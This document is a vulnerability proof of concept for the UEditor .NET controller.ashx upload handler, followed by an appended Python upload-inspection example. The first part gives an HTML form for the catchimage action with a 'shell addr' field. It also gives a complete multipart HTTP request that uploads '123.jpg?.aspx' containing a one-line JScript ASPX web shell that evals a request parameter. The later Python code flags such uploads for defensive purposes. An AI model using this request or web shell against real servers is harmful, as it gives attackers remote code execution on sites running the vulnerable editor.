Vulnerability location
/scripts/ueditor/net/controller.ashx?action=uploadimage
Vulnerability PoC
Local upload PoC
<form action="http://www.xxxxx.com/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
  shell addr: <input type="text" name="source[]" />
  <input type="submit" value="Submit" />
</form>
HTTP request
POST /scripts/ueditor/net/controller.ashx?action=uploadimage HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------139961334010512
Content-Length: 266
Connection: close
Cookie: acw_tc=76b20f4315759493974777367eaf0c66d856b23bd121ba2ceaed703d7277aa
Upgrade-Insecure-Requests: 1

-----------------------------139961334010512
Content-Disposition: form-data; name="upfile"; filename="123.jpg?.aspx"
Content-Type: image/jpeg

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
-----------------------------139961334010512--
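A server-side check for the upload shape shown in the request above (an image Content-Type, a filename whose last extension is `.aspx`, and a body that is not image data), added here as a defensive example and not part of the original page or of UEditor. The extension allowlist, the filename policy, the finding labels and the sample bodies are assumptions constructed for this example.

```python
import re
from email.parser import BytesParser
from email.policy import HTTP

IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}   # assumed allowlist
MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a", b"BM")
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")               # assumed filename policy


def inspect_upload(content_type: str, body: bytes, field: str = "upfile") -> list:
    """Return findings for the named file part of a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = BytesParser(policy=HTTP).parsebytes(raw)
    findings = []
    for part in msg.iter_parts():
        if part.get_param("name", header="content-disposition") != field:
            continue
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        if not SAFE_NAME.fullmatch(name):
            findings.append("bad-char")      # e.g. '?' inside the filename
        # Only the text after the LAST dot counts as the extension.
        ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext not in IMAGE_EXTS:
            findings.append("ext:" + ext)
        if not data.startswith(MAGIC):
            findings.append("not-image")     # declared image/*, content is not
    return findings


def build_body(boundary: str, filename: str, payload: bytes) -> bytes:
    """Constructed sample: a single 'upfile' part declared as image/jpeg."""
    head = ('--%s\r\nContent-Disposition: form-data; name="upfile"; '
            'filename="%s"\r\nContent-Type: image/jpeg\r\n\r\n' % (boundary, filename))
    tail = "\r\n--%s--\r\n" % boundary
    return head.encode("ascii") + payload + tail.encode("ascii")


BOUNDARY = "---------------------------139961334010512"
CT = "multipart/form-data; boundary=" + BOUNDARY
# Constructed inputs: same filename as the request above with a placeholder body,
# and an ordinary JPEG-like upload for comparison.
SUSPICIOUS = build_body(BOUNDARY, "123.jpg?.aspx", b'<%@ Page Language="Jscript"%>')
BENIGN = build_body(BOUNDARY, "photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)

if __name__ == "__main__":
    print(inspect_upload(CT, SUSPICIOUS))
    print(inspect_upload(CT, BENIGN))
```

Rejecting on any finding and storing accepted files under a server-generated name with an allowlisted extension keeps the client-supplied filename from deciding which handler serves the file.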